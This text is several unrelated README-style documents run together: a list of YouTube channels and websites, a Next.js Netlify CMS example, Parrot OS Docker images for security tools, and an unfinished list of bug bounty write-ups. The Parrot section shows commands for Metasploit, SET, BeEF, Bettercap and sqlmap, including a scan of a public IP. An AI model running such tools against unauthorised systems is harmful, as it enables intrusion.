and find collaborators - [ScienceDirect](https://www.sciencedirect.com/) ← website which provides subscription-based access to a large database of scientific and medical research - [Sci-Hub](https://sci-hub.now.sh/) ← unlock access to all scientific papers using its URL, PMID/DOI - [Springer](https://link.springer.com/) ← access to millions of scientific documents from journals, books, series, protocols, reference works and proceedings - [Wikipedia's List of academic databases and search engines](https://en.wikipedia.org/wiki/List_of_academic_databases_and_search_engines) **[⬆ Back to Contents](#contents)** ## 📼 YouTube Channels ### cybersecurity - [Gynvael Coldwind](https://www.youtube.com/user/GynvaelEN) ← podcasts about CTFs, computer security, programming and similar things. You can also check out [Gynvael's (🇵🇱) channel](https://www.youtube.com/user/GynvaelColdwind) - [HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) ← ethical hacking tutorials - [John Hammond](https://www.youtube.com/user/RootOfTheNull) ← tutorials and videos on lots of programming languages - [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) ← preparing for CTFs - [Mateusz Chrobok](https://www.youtube.com/c/MateuszChrobok) (🇵🇱) ← channel of a CyberSecurity Geek - [Niebezpiecznik](https://www.youtube.com/channel/UCe6nK69Yc1zna7QSJEfA9pw) (🇵🇱) ← cybersecurity channel ### data science - [AI Explained](https://www.youtube.com/@ai-explained-) ← covering the biggest news of the century - the arrival of smarter-than-human AI - [CodeEmporium](https://www.youtube.com/channel/UC5_6ZD6s8klmMu9TXEB_1IA) ← data science topics explained through simple visualisations - [Daniel Bourke](https://www.youtube.com/channel/UCr8O8l5cCX85Oem1d18EezQ) ← machine learning engineer who plays at the intersection of technology and health - [David Robinson](https://www.youtube.com/channel/UCeiiqmVK07qhY-wvg3IZiZQ) ← hours of data analysis in R - [Deeplearning.ai](https://www.youtube.com/channel/UCcIXc5mJsHVYTZR1maL5l9w) ← more of Andrew Ng - [DeepLearning.TV](https://www.youtube.com/channel/UC9OeZkIwhzfv-_Cb7fCikLQ) ← complex topics explained with great visualisations - [deeplizard](https://www.youtube.com/channel/UC4UJ26WkceqONNF5S26OiVw) ← AI/ML explained - [Jay Alammar](https://www.youtube.com/channel/UCmOwsoHty5PrmE-3QhUBfPQ) ← high-quality videos with simple ML visualisations - [Luis Serrano](https://www.youtube.com/c/LuisSerrano) ← complex topics, mainly in mathematics, machine learning, and artificial intelligence - [sentdex](https://www.youtube.com/user/sentdex) ← Python programming tutorials - [Siraj Raval](https://www.youtube.com/channel/UCWN3xxRkmTPmbKwht9FuE5A) ← AI, ML, Python and more (unfortunately [involved in the scandal of plagiarism](https://www.youtube.com/watch?v=Mz3Mu9e0qRQ)) - [StatQuest with Josh Starmer](https://www.youtube.com/user/joshstarmer) ← major statistical methodologies into easy to understand pieces (I highly recommend it!) - [The AI University](https://www.youtube.com/channel/UCv6Uw36LRbYnX4HDxKPguKg) ← educational channel on data science, data analysis, data engineering and cloud architecture - [Thu Vu data analytics](https://www.youtube.com/c/Thuvu5) ← information on entering a Data analytics / Data science career - [Two Minute Papers](https://www.youtube.com/user/keeroyz) ← quick reviews of scientific research papers - [What's AI](https://www.youtube.com/channel/UCUzGQrN-lyyc0BWTYoJM_Sg) ← quick reviews of scientific research papers and AI terms explained - [Yannic Kilcher](https://www.youtube.com/c/YannicKilcher) ← videos about machine learning research papers, programming, and issues of the AI community and the broader impact of AI in society ### devops/mlops - [ByteByteGo](https://www.youtube.com/@ByteByteGo) ← topics and trends in large-scale system design - [DevOps Toolkit](https://www.youtube.com/c/DevOpsToolkit) ← channel of a passionate DevOps who keeps us up with the most recent DevOps tools - [MLOps.community](https://www.youtube.com/c/MLOpscommunity/) ← Machine Learning Operations best practices from engineers in the field ### entertainment - [Alan Becker](https://www.youtube.com/channel/UCbKWv2x9t6u8yZoB3KcPtnw) ← fights of stick figures - [Daily Dose Of Internet](https://www.youtube.com/channel/UCdC0An4ZPNr_YiFiYoVbwaw) ← the best and top trending videos from all over the Internet in short videos - [Dylan Tallchief](https://www.youtube.com/channel/UCIu2Fj4x_VMn2dgSB1bFyQA) ← fun look over the music production - [GeoWizard](https://www.youtube.com/c/GeoWizard) ← adventure and geography videos + stories - [I did a thing](https://www.youtube.com/channel/UCJLZe_NoiG0hT7QCX_9vmqw) ← the author likes to do things - [Level UP](https://www.youtube.com/channel/UCNK813T2BNBwcfDPDTPeMPA) ← mario animations - [PewDiePie](https://www.youtube.com/user/PewDiePie) ← meme/game reviews and not only - [videogamedunkey](https://www.youtube.com/channel/UCsvn_Po0SmunchJYOWpOxMg) ← game reviews ### math - [3blue1brown](https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw) ← driven by animations for difficult problems to be made simple with changes in perspective - [blackpenredpen](https://www.youtube.com/user/blackpenredpen) ← for everyone who loves math - [Brian McLogan](https://www.youtube.com/user/MrBrianMcLogan) ← teaching math from the perspective of the struggling student - [Brilliant](https://www.youtube.com/channel/UCpR62MSOeBQVXub13xwZ8aA) ← excel in math and science - [Domain of Science](https://www.youtube.com/user/dominicwalliman) ← overview of science with the help of single maps - [Eddie Woo](https://www.youtube.com/channel/UCq0EGvLTyy-LLT1oUSO_0FQ) ← one of the most enthusiastic math teachers on the web - [Flammable Maths](https://www.youtube.com/c/papaflammy) ← memes and math! - [Krista King](https://www.youtube.com/user/TheIntegralCALC) ← master in math - [Looking Glass Universe](https://www.youtube.com/channel/UCFk__1iexL3T5gvGcMpeHNA) ← about the strange world of maths and physics - [Mathemaniac](https://www.youtube.com/c/Mathemaniac) ← showing a more fun side of Mathematics, as well as the elegance of Math - [Mathologer](https://www.youtube.com/c/Mathologer) ← really accessible explanations of hard and beautiful math(s) - [Michael Penn](https://www.youtube.com/c/MichaelPennMath) ← math videos covering Calculus, Differential Equations, Number Theory and more - [MindYourDecisions](https://www.youtube.com/user/MindYourDecisions) ← brain teasers - [Numberphile](https://www.youtube.com/user/numberphile) ← videos about numbers - [Prof Ghrist Math](https://www.youtube.com/channel/UC5N5pRddyicAX1QJyJjIIdg) ← animated introduction to calculus - [standupmaths](https://www.youtube.com/user/standupmaths) ← mathematics and stand-up (sometimes simultaneously) - [statisticsfun](https://www.youtube.com/channel/UClD8c_piy1nrJySPJUgyivg) ← visual explanations of algebra, trig, calculus, statistics, and economics - [The Organic Chemistry Tutor](https://www.youtube.com/channel/UCEWpbFLzoYGPfuWUMFPSaoA) ← tutorial videos on organic chemistry, general chemistry, physics, algebra, trigonometry, precalculus, and calculus - [Think Twice](https://www.youtube.com/ThinktwiceLTU) ← animated math videos - [Welch Labs](https://www.youtube.com/user/Taylorns34) ← math, science, and machine learning resources ### productivity/business - [Akademia Bogactwa](https://www.youtube.com/channel/UC6SinQiw2eDU6k9tEXpZv9g) (🇵🇱) ← daily vlog of Polish entrepreneur focused on real estate - [Ali Abdaal](https://www.youtube.com/user/Sepharoth64) ← one of the best channels to learn organisation and study techniques from a med student - [Andrzej Krzywda](https://www.youtube.com/channel/UCmrGGj6Y_XQuockwwI3yemA) (🇵🇱) ← daily vlog of Polish programmer/entrepreneur - [Benjamin Keep, PhD, JD](https://www.youtube.com/@benjaminkeep) ← insights into learning, science, and society. For teachers, students and the science-curious - [BrainCraft](https://www.youtube.com/user/braincraftvideo) ← self-improvement tips and advice based in psychology and neuroscience - [Charisma on Command](https://www.youtube.com/user/charismaoncommand) ← master your charisma - [Devstyle](https://www.youtube.com/channel/UCACp5rqV3Ki0SNdXWDBLhRA) (🇵🇱) ← daily vlog of Polish entrepreneur (past programmer) - [FightMediocrity](https://www.youtube.com/channel/UCXLesGEfmyhxqOjoAqhRwhA) ← summaries of the most inspiring books - [HealthyGamerGG](https://www.youtube.com/c/HealthyGamerGG/) ← mental health platform designed to help the internet generation succeed - [Justin Sung](https://www.youtube.com/@JustinSung) ← studying and learning, time management - [MiroBurn](https://www.youtube.com/channel/UCwmFNbGnBeEy9nTt42F4WHw) (🇵🇱) ← daily vlog of Polish entrepreneur focused on online courses, biohacking, motivating others and establishing new companies - [Wojna Idei](https://www.youtube.com/channel/UC7RswyY8VfbSdikz_8wdp3w) (🇵🇱) ← psychology, philosophy, sociology and culture ### programming - [anthonywritescode](https://www.youtube.com/@anthonywritescode) ← various videos about programming and related topics (most videos deal with Python) - [ArjanCodes](https://www.youtube.com/c/arjancodes) ← Python videos abouVarious videos about programming and related topicst programming and software design to help you take your coding skills to the next level - [Branch Education](https://www.youtube.com/c/BranchEducation) ← engineering and science concepts illuminated with videos of accurate models and visualized physics - [Computerphile](https://www.youtube.com/channel/UC9-y-6csu5WGm29I7JiwpnA) ← general computer science channel - [Corey Schafer](https://www.youtube.com/channel/UCCezIgC97PvUuR4_gbFUs5g) ← Python in data science and not only - [Daniel Rakowiecki](https://www.youtube.com/c/DanielRakowiecki/) (🇵🇱) ← electronics repair (laptops, consoles and more) - [Derek Banas](https://www.youtube.com/user/derekbanas) ← is there a topic on which Derek didn't record a tutorial? - [Errichto](https://www.youtube.com/channel/UCBr_Fu6q9iHYQCh13jmpbrg) ← solving advanced algorithms step by step - [Fireship](https://www.youtube.com/c/Fireship) ← intermediate to advanced lessons about JavaScript, Flutter, Firebase, and modern app development. The channel hosts lots of videos explaining complex topics in 100 seconds - [FORBOT](https://www.youtube.com/c/forbot/) (🇵🇱) ← electronics and programming courses - [freeCodeCamp](https://www.youtube.com/channel/UC8butISFwT-Wl7EV0hUK0BQ) ← videos from open-source community - [Gaurav Sen](https://www.youtube.com/c/GauravSensei/) ← one of the most talented YouTube teachers of Competitive programming, System design and Artificial intelligence - [Kevin Naughton Jr.](https://www.youtube.com/channel/UCKvwPt6BifPP54yzH99ff1g) ← LeetCode challenges solver - [Pasja Informatyki](https://www.youtube.com/user/MiroslawZelent) (🇵🇱) ← general IT/psychology channel - [ProgrammingKnowledge](https://www.youtube.com/user/ProgrammingKnowledge) ← one of the most varied programming channel - [Programming with Mosh](https://www.youtube.com/channel/UCWv7vMbMWH4-V0ZXdmDpPBA) ← lots of videos on Python, JavaScript, C# - [Python Engineer](https://www.youtube.com/c/PythonEngineer) ← Python and Machine Learning tutorials - [RS Elektronika](https://www.youtube.com/c/RSElektronika) (🇵🇱) ← for anyone interested in electronics - [Simplilearn](https://www.youtube.com/c/SimplilearnOfficial/) ← online bootcamp focused on helping people acquire the skills they need to thrive in the digital economy - [The Coding Train](https://www.youtube.com/channel/UCvjgXvBlbQiydffZU7m1_aw) ← one of the most-enthusiastic coders on the web - [ThePrimeagen](https://www.youtube.com/@ThePrimeagen) ← Vim, Rust, TypeScript with a lot of humor (also check the 2nd channel: [ThePrimeTime](https://www.youtube.com/@ThePrimeTimeagen)) - [UW-TEAM.org](https://www.youtube.com/c/uwteamorg) (🇵🇱) ← programming, Linux, security, and more - [WilliamFiset](https://www.youtube.com/user/purpongie) ← educational computer science and mathematics videos ### science - [AK LECTURES](https://www.youtube.com/user/mathdude2012) ← biology, biochemistry and physics. I recommend going through the playlists - [AsapSCIENCE](https://www.youtube.com/channel/UCC552Sd-3nyi_tk2BudLUzA) ← quick scientific explanations - [Astrofaza](https://www.youtube.com/user/Astrofaza) (🇵🇱) ← everything about space - [BrainStuff - HowStuffWorks](https://www.youtube.com/user/BrainStuffShow) ← everyday science in the world around us - [CGP Grey](https://www.youtube.com/user/CGPGrey) ← short explanatory videos on varying subjects, including politics, geography, economics, history, and culture - [DIY Perks](https://www.youtube.com/c/DIYPerks) ← plenty of interesting DIY projects on a variety of topics, including computers, woodworking, electronics, audio, and more! - [exurb1a](https://www.youtube.com/user/willunicycleforfood) ← attempt to explain the way universe works - [Geography Now](https://www.youtube.com/user/GeographyNow) ← first and only Youtube Channel that actively attempts to cover profiles on every single country of the world - [iBiology](https://www.youtube.com/user/ibioseminars) ← biology talks by the world's leading scientists that show the process of science and the wonders of discovery. Make sure to check out their other channels - [iBiology Techniques](https://www.youtube.com/user/iBioEducation) ← iBiology technique driven videos such as a microscopy course - [It's Okay To Be Smart](https://www.youtube.com/user/itsokaytobesmart) ← Joe Hanson, Ph.D. is a curious group of atoms in a curious universe, and he's here to tell you how it all works - [Kurzgesagt](https://www.youtube.com/user/Kurzgesagt) ← videos explaining things with optimistic nihilism (quality > quantity) - [Langfocus](https://www.youtube.com/channel/UCNhX3WQEkraW3VHPyup8jkQ) ← channel of a language enthusiast, globetrotter - [Lex Clips](https://www.youtube.com/channel/UCJIfeSCssxSC_Dhc5s7woww) ← clips from the Artificial Intelligent podcast and other conversations with Lex Fridman - [Life Noggin](https://www.youtube.com/user/lifenoggin) ← quickly animated explanations - [Mark Rober](https://www.youtube.com/user/onemeeeliondollars) ← channel of a former NASA engineer and a friend of science - [MinuteEarth](https://www.youtube.com/user/minuteearth) ← science and stories about our awesome planet - [minutephysics](https://www.youtube.com/user/minutephysics) ← cool physics and other sweet science - [Nauka. To Lubię](https://www.youtube.com/user/naukatolubie) (🇵🇱) ← for everyone who likes science - [National Geographic](https://www.youtube.com/user/NationalGeographic) ← world's premium destination for science, exploration, and adventure - [PBS Space Time](https://www.youtube.com/channel/UC7_gcs09iThXybpVgjHZ_7g) ← explore the outer reaches of space, the craziness of astrophysics, the possibilities of sci-fi and more - [Physics Girl](https://www.youtube.com/user/physicswoman) ← adventures into the physical sciences with experiments, demonstrations, and cool new discoveries - [Primer](https://www.youtube.com/channel/UCKzJFdi57J53Vr_BkTfN3uQ) ← animated academic subjects - [Reigarw Comparisons](https://www.youtube.com/user/reigarw) ← comparisons of sizes, speed, price, or anything interesting - [SciFun](https://www.youtube.com/user/SciTeraz) (🇵🇱) ← world of science - [Simone Giertz](https://www.youtube.com/channel/UC3KEoMzNz8eYnwBC34RaKCQ) ← channel of a maker/robotics enthusiast/non-engineer - [Smarter Every Day](https://www.youtube.com/user/destinws2) ← exploring the world using science (also check out [the 2nd channel](https://www.youtube.com/user/FunnerEveryDay)) - [Smartgasm](https://www.youtube.com/channel/UCwylAt0VrqZPPNCjQV2t8Qg) (🇵🇱) ← lots of astronomy and physics - [Stuff Made Here](https://www.youtube.com/channel/UCj1VqrHhDte54oLgPG4xpuQ) ← building fabrication projects, writing software, making electronics, and more - [The Thought Emporium](https://www.youtube.com/user/TheChemlife) ← from biohacking and biology, to nuclear physics and nanotech - [TierZoo](https://www.youtube.com/channel/UCHsRtomD4twRf5WVHHk-cMw) ← what if to talk about animals in terms of stats - [Today I Found Out](https://www.youtube.com/user/TodayIFoundOut) ← brand new videos 7 days a week to learn something new - [Tom Scott](https://www.youtube.com/user/enyay) ← channel of a British Internet personality - [Uwaga! Naukowy Bełkot](https://www.youtube.com/channel/UC_7PqixGIdE-jjoHKMPYpGA) (🇵🇱) ← well-researched topics from the overall science - [Veritasium](https://www.youtube.com/user/1veritasium) ← videos about science, education, and anything else found interesting - [Vsauce](https://www.youtube.com/user/Vsauce) ← mostly scientific, psychological, mathematical, and philosophical topics - [What If](https://www.youtube.com/channel/UCphTF9wHwhCt-BzIq-s4V-g) ← what if ___ ? - [What I've Learned](https://www.youtube.com/channel/UCqYPhGiB9tkShZorfgcL2lA) ← mostly health-based videos from a single person ### tech - [Dave Lee](https://www.youtube.com/channel/UCVYamHliCI9rw1tHR1xbkfw) ← critical reviews of the newest tech on the market - [Linus](https://www.youtube.com/user/LinusTechTips) ← entertaining tech explanations - [Techquickie](https://www.youtube.com/user/Techquickie) ← humorous answers to tech questions - [ThioJoe](https://www.youtube.com/c/ThioJoe) ← technology videos, including tech news, reviews, and discussions (mainly focused on Windows) **[⬆ Back to Contents](#contents)** ## 🤷‍ Other - [Ancient Earth globe](https://dinosaurpictures.org/ancient-earth) ← check how Earth looked like x years ago - [Awesome](https://github.com/sindresorhus/awesome) ← GitHub repository with lists on all kinds of interesting topics - [awesome-awesome-awesome](https://github.com/jonatasbaldin/awesome-awesome-awesome) ← awesome list of repositories of awesome lists - [Awesome Search](https://awesomelists.top/) ← search all awesome lists in one second - [List.community](https://list.community/) ← better graphical form of Awesome - [Buoy](https://www.buoyhealth.com/symptom-checker/) ← check your symptoms with an online AI assistant - [Can I email](https://www.caniemail.com/) ← check which HTML and CSS elements are supported by your mail client - [Code Wizard ~ Ash Kyd](https://ash.ms/) ← website of a developer in a Windows ME style. It's worth checking out the arrangement of blog posts/vlogs - [discount-for-student-dev](https://github.com/AchoArnold/discount-for-student-dev) ← list of student discounts for learning & development - [DistroTest](https://distrotest.net/) ← try running any Linux distro in the cloud VM - [Follow Friday](https://followfriday.io/) ← interesting people to follow, categorised by topics like AI, design or programming - [list of accounts I'm following](https://twitter.com/pawel_cislo/following) ← all the people that influence my writing on [pawelcislo.com](https://pawelcislo.com/) - [Future Timeline](https://www.futuretimeline.net/) ← timeline of future predictions - [How much free time do you have?](https://erikrood.com/Posts/free_time_calc.html) ← specify values and get the result - [Internet Archive](https://archive.org/web/) ← wayback machine with a digital library of Internet sites - [My Pinterest account](https://pinterest.com/pyxelrr/) ← aggregation of the most practical infographics that I stepped on - [Nerd Fonts](https://www.nerdfonts.com/) ← iconic font aggregator, collection, and patches - [NUKEMAP](https://nuclearsecrecy.com/nukemap/) ← mapping mash-up that calculates the effects of the detonation of a nuclear bomb - [Programming Fonts](https://app.programmingfonts.org/) ← quickly check lots of programming fonts in your browser - [Related subreddits](https://anvaka.github.io/sayit/?query=datascience&utm_source=hackernewsletter&utm_medium=email&utm_term=show_hn) ← find related subreddits in the form of a graph - [scrcpy](https://github.com/Genymobile/scrcpy) ← display and control Android devices connected on USB - [Simone's Computer](https://simone.computer/#/webdesktops) ← list of websites that resemble desktop GUIs - [Six Degrees of Wikipedia](https://www.sixdegreesofwikipedia.com/) ← find the shortest path from one Wikipedia article to another - [Stellarium Web Online Star Map](https://stellarium-web.org/) ← online planetarium - [The Scale of the Universe 2](https://htwins.net/scale2/) ← ride down to the smallest thing theorised by scientists and then out to the vastness of the universe - [TLDRLegal](https://tldrlegal.com/) ← software licences explained in plain English - [Webamp](https://webamp.org/) ← Winamp 2 in your browser - [WebGL Fluid Simulation](https://paveldogreat.github.io/WebGL-Fluid-Simulation/) ← have some fun :) - [windows95](https://github.com/felixrieseberg/windows95) ← Windows 95 running in the Electron app - [Zero Width Shortener](https://zws.im/) ← URL shortener that shortens URLs using spaces that have zero width, making them invisible to humans **[⬆ Back to Contents](#contents)**
# Example app using Netlify CMS ## How to use ### Using `create-next-app` Execute [`create-next-app`](https://github.com/segmentio/create-next-app) with [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) or [npx](https://github.com/zkat/npx#readme) to bootstrap the example: ```bash npx create-next-app --example with-netlify-cms with-netlify-cms-app # or yarn create next-app --example with-netlify-cms with-netlify-cms-app ``` ### Download manually Download the example: ```bash curl https://codeload.github.com/zeit/next.js/tar.gz/canary | tar -xz --strip=2 next.js-canary/examples/with-netlify-cms cd with-netlify-cms ``` Install it and run: ```bash npm install npm run dev # or yarn yarn dev ``` Deploy it to the cloud with [now](https://zeit.co/now) ([download](https://zeit.co/download)) ```bash now ``` ## The idea behind the example [Netlify CMS](https://www.netlifycms.org/) is an open source content management system for your Git workflow that enables you to provide editors with a friendly UI and intuitive workflows. You can use it with any static site generator to create faster, more flexible web projects. Content is stored in your Git repository alongside your code for easier versioning, multi-channel publishing, and the option to handle content updates directly in Git. ## How it works Sites take its content from markdown files in `/content`. Two of pages (`home` and `about`) are referencing directly their respective markdown files. Blog component loads all posts (during build!) and lists them out [How to load multiple md files](https://medium.com/@shawnstern/importing-multiple-markdown-files-into-a-react-component-with-webpack-7548559fce6f) Posts are separate static sites thanks to dynamically created export map. I took inspiration on how to do it from [here](https://medium.com/@joranquinten/for-my-own-website-i-used-next-js-725678e65b09)
# Docker images for Parrot OS Docker is a powerful technology that allows users to run containers universally on any host platform. Docker uses template images, and allows the user to start several instances of the same template, destroy them, or build new custom templates on top of them. Parrot uses docker to allow its users to use its vast arsenal of tools on any platform supported by docker. [Parrot Core](#parrotseccore) [Parrot Security](#parrotsecsecurity) [Nmap](#parrotsectools-nmap) [Metasploit](#parrotsectools-metasploit) [Social Engineering Toolkit](#parrotsectools-set) [Beef-XSS](#parrotsectools-beef) [Bettercap](#parrotsectoos-bettercap) [SQLMap](#parrotsectools-sqlmap) [Builder Container](#parrotsecbuild) [skip to usage examples](#general-usage-instructions-and-examples) # Available Templates Whether you want to have a container full of tools, or several smaller containers with a tiny selection of tools, or even a clean Parrot environment to build yor custom stack on, this is the right place where to learn how to take advantage of the Parrot Docker workspace. ## parrotsec/core Core system with just the Parrot basics. You can use it as a start point to create your custom containers. available flavors: **parrotsec/core:latest** based on parrot rolling (debian testing) amd64 **parrotsec/core:rolling-amd64** based on parrot rolling (debian testing) amd64 **parrotsec/core:rolling-i386** based on parrot rolling (debian testing) i386 **parrotsec/core:lts-amd64** based on parrot lts (devuan stable) amd64 **parrotsec/core:lts-i386** based on parrot lts (devuan stable) i386 **parrotsec/core:lts-arm64** based on parrot lts (devuan stable) arm64 **parrotsec/core:lts-armhf** based on parrot lts (devuan stable) armhf launch the container: `docker run --rm -ti --network host -v $PWD/work:/work parrotsec/core:lts-amd64` ## parrotsec/security This container includes a huge collection of tools that can be used via command line from inside a docker container. Some tools with graphical interface were excluded for obvious reasons. This container ships with the following metapackages: * parrot-pico * parrot-mini * parrot-tools-cloud available flavors: **parrotsec/security:latest** built over parrotsec/core:rolling-amd64 **parrotsec/security:rolling** built over parrotsec/core:rolling-amd64 **parrotsec/security:lts** built over parrotsec/core:lts-amd64 Launch the container: `docker run --rm -ti --network host -v $PWD/work:/work parrotsec/security` ## parrotsec/tools-* This is a curated selection of smaller docker containers that contain only specific tools, alone or in cherry-picked collections. Containers with shared tools are stacked on top of each other (when possible) to minimize storage waste and maximize layers reuse. available templates: ### parrotsec/tools-nmap based on parrotsec/core:rolling-amd64 provides the following packages: * nmap * ncat * ndiff * dnsutils * netcat * telnet usage: `docker run --rm -ti parrotsec/tools-nmap <nmap options>` examples: `docker run --rm -ti parrotsec/tools-nmap -F 192.168.1.1` `docker run --rm -ti parrotsec/tools-nmap -Pn 89.36.210.176` ### parrotsec/tools-metasploit based on parrotsec/tools-nmap:latest provides the following packages: * parrot-pico * metasploit-framework * postgresql usage: `docker run --rm -ti --network host -v $PWD/msf:/root/ parrotsec/tools-metasploit` ### parrotsec/tools-set based on parrotsec/tools-metasploit:latest provides the following packages: * set usage: `docker run --rm -ti --network host -v $PWD/set:/root/.set parrotsec/tools-set` ### parrotsec/tools-beef based on parrotsec/core:rolling-amd64 provides the following packages: * beef-xss usage: `docker run --rm --network host -ti -v $PWD/beef:/var/lib/beef-xss parrotsec/tools-beef` ### parrotsec/tools-bettercap based on parrotsec/core:rolling-amd64 provides the following packages: * bettercap usage: `docker run --rm -ti parrotsec/tools-bettercap` ### parrotsec/tools-sqlmap based on parrotsec/core:rolling-amd64 provides the following packages: * sqlmap usage: `docker run --rm -ti parrotsec/tools-sqlmap <sqlmap options>` example: `docker run --rm -ti parrotsec/tools-sqlmap -u parrotsec.org --wizard` ## parrotsec/build This container is used internally by the Parrot Build Platform to test and build the distro packages. Even if it is not meant to be used directly by users, it contains all the tools to work on debian packaging and properly test package builds in clean and disposable environments. This container ships with the following packages: * git-buildpackage * ubuntu-dev-tools * devscripts * debhelper * dh-apparmor * dh-autoreconf * dh-buildinfo * dh-cargo * dh-consoledata * dh-di * dh-exec * dh-golang * dh-linktree * dh-lisp * dh-lua * dh-make * dh-make-golang * dh-make-perl * dh-metainit * dh-perl6 * dh-php * dh-python * dh-runit * dh-strip-nondeterminism * dh-sysuser * dh-vim-addon * dh-virtualenv * kernel-wedge Available flavors: **parrotsec/build:latest** based on parrotsec/core:rolling-amd64 **parrotsec/build:rolling-amd64** based on parrotsec/core:rolling-amd64 **parrotsec/build:rolling-i386** based on parrotsec/core:rolling-i386 **parrotsec/build:lts-amd64** based on parrotsec/core:lts-amd64 **parrotsec/build:lts-i386** based on parrotsec/core:lts-i386 **parrotsec/build:lts-arm64** based on parrotsec/core:lts-arm64 **parrotsec/build:lts-armhf** based on parrotsec/core:lts-armhf Example usage: ``` git clone https://nest.parrot.sh/packages/tools/metasploit-framework cd metasploit-framework <make your modfications to the package here> cd .. docker run --rm -ti -v $PWD:/build/ parrotsec/build:rolling-amd64 - bash cd /build/metasploit-framework apt build-dep . debuild -us -uc exit ``` # General Usage Instructions and Examples ## Launch a container: `docker run --name pcore-1 -ti parrotsec/core` NOTE: the pcore-1 name is arbitrary and can be customized ## Stop the container: `docker stop pcore-1` ## Resume a previously-stopped container: `docker start pcore-1` ## Remove a container after use: `docker rm pcore-1` ## List all the instantiated containers: `docker ps -a` ## Start multiple containers: on terminal 1 -> `docker run --name pentest1 -ti parrotsec/security` on terminal 2 -> `docker run --name pentest2 -ti parrotsec/security` on terminal 3 -> `docker run --name msf-listener -ti parrotsec/tools-metasploit` ## Remove all the containers: `docker rm $(docker ps -qa)` ## Start a container and automatically remove it on exit: `docker run --rm -ti parrotsec/core` ## Use Volumes to share files with the host: It is a good practice to not keep persistent docker containers, but to remove them on every use and make sure to save important files on a docker volume. The following command creates a **work** folder inside the current directory and mounts it in /work inside the container. `docker run --rm -ti -v $PWD/work:/work parrotsec/core` ## Use Volumes to share files across multiple containers: on terminal 1 -> `docker run --name pentest -ti -v $PWD/work:/work parrotsec/security` on terminal 2 -> `docker run --rm --network host -v $PWD/work:/work -ti parrotsec/security` on terminal 3 -> `docker run --rm -v $PWD/work:/work -ti parrotsec/tools-metasploit` ## Open a port from the container to the host Every docker container has its own network space connected to a virtual LAN. All the traffic from within the docker container will be NATted by the host computer. If you need to expose a port to other machines outside your local computer, use the following exaple: `docker run --rm -p 8080:80 -ti parrotsec/core` Note that the first port is the port that will be opened on your host, and the second one is the container port to bind to. Here a reference usage of the -p flag: **-p <host port>:<container port>** `-p 8080:80` **-p <host port>:<container port>/<proto>** `-p 8080:80/tcp` **-p <address>:<host port>:<container port>** `-p 192.168.1.30:8080:80` (in case of multiple adresses on host network) ## Use network host instead of docker NAT Every docker container has its own network space connected to a virtual LAN. All the traffic from within the docker container will be NATted by the host computer. If you need to make the docker container share the same networking space of the host machine, then use the **--network host** flag as shown below `docker run --rm --network host -ti parrotsec/core` NOTE 1: every port opened in the container will be opened on the host as well. NOTE 2: you can perform packet sniffing on the host network. NOTE 3: iptables rules applied inside the container will take effect on the host as well.
# Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty # Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability that I have no idea how to exploit. Let say you found a RPO (Relativce Path Overwrite) in a website, but you have no idea how should you exploit that, then the perfect place to go would be [here](http://blog.innerht.ml/rpo-gadgets/). Or you have found your customer is using oauth mechanism but you have no idea how should we test it, the other perfect place to go would be [here](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) My intention is to make a full and complete list of common vulnerability that are publicly disclosed bug bounty write-up, and let Bug Bounty Hunter to use this page as a reference when they want to gain some insight for a particular kind of vulnerability during Bug Hunting, feel free to submit pull request. Okay, enough for chit-chatting, let's get started. - [XSSI](#xssi) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [Brute Force](#brute-force) - [SQL Injection (SQLi)](#sql-injection) - [External XML Entity Attack (XXE)](#xxe) - [Remote Code Execution (RCE)](#remote-code-execution) - [Deserialization](#deserialization) - [Image Tragick](#image-tragick) - [Cross-Site Request Forgery (CSRF)](#csrf) - [Insecure Direct Object Reference (IDOR)](#direct-object-reference-idor) - [Stealing Access Token](#stealing-access-token) - [Google Oauth Login Bypass](#google-oauth-bypass) - [Server Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf) - [Unrestricted File Upload](#unrestricted-file-upload) - [Race Condition](#race-condition) - [Business Logic Flaw](#business-logic-flaw) - [Authentication Bypass](#authentication-bypass) - [HTTP Header Injection](#http-header-injection) - [Email Related](#email-related) - [Money Stealing](#money-stealing) - [Miscellaneous](#miscellaneous) ### Cross-Site Scripting (XSS) - [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach - [RPO that lead to information leakage in Google](http://blog.innerht.ml/rpo-gadgets/) by filedescriptor - [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton - he is able to make stored XSS from a irrelevant domain to main facebook domain - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek - [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S - [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO - [Stored XSS in Google Docs (Bug Bounty)](http://hmgmakarovich.blogspot.hk/2015/11/stored-xss-in-google-docs-bug-bounty.html) by Harry M Gertos - [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) - [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa - [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen - [Best Google XSS 